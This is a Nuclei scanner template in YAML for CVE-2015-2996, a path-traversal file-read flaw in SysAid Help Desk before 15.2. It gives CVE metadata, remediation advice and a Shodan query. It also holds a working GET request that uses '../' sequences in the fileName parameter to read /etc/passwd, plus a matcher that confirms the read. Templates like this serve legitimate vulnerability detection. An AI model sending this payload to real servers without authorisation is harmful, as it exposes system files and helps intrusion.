48 lines
1.8 KiB
YAML
48 lines
1.8 KiB
YAML
id: CVE-2015-2996
|
|
|
|
info:
|
|
name: SysAid Help Desk <15.2 - Local File Inclusion
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: |
|
|
SysAid Help Desk before 15.2 contains multiple local file inclusion vulnerabilities which can allow remote attackers to read arbitrary files via .. (dot dot) in the fileName parameter of getGfiUpgradeFile or cause a denial of service (CPU and memory consumption) via .. (dot dot) in the fileName parameter of calculateRdsFileChecksum.
|
|
remediation: |
|
|
Upgrade SysAid Help Desk to version 15.2 or later to mitigate the vulnerability.
|
|
reference:
|
|
- https://seclists.org/fulldisclosure/2015/Jun/8
|
|
- https://www.sysaid.com/blog/entry/sysaid-15-2-your-voice-your-service-desk
|
|
- http://seclists.org/fulldisclosure/2015/Jun/8
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-2996
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:C
|
|
cvss-score: 8.5
|
|
cve-id: CVE-2015-2996
|
|
cwe-id: CWE-22
|
|
epss-score: 0.77754
|
|
epss-percentile: 0.97916
|
|
cpe: cpe:2.3:a:sysaid:sysaid:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 2
|
|
vendor: sysaid
|
|
product: sysaid
|
|
shodan-query: http.favicon.hash:1540720428
|
|
tags: cve,cve2015,sysaid,lfi,seclists
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"
|
|
- "{{BaseURL}}/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd"
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a0046304402204e38267f6691963853a51ee5dfdcb17078fc03fe2fa845befd500be9935ae429022007ec8ae59c0cc58baf199041273e94a52e48770f80dbb073a26027e73fba11ee:922c64590222798bb761d5b6d8e72950 |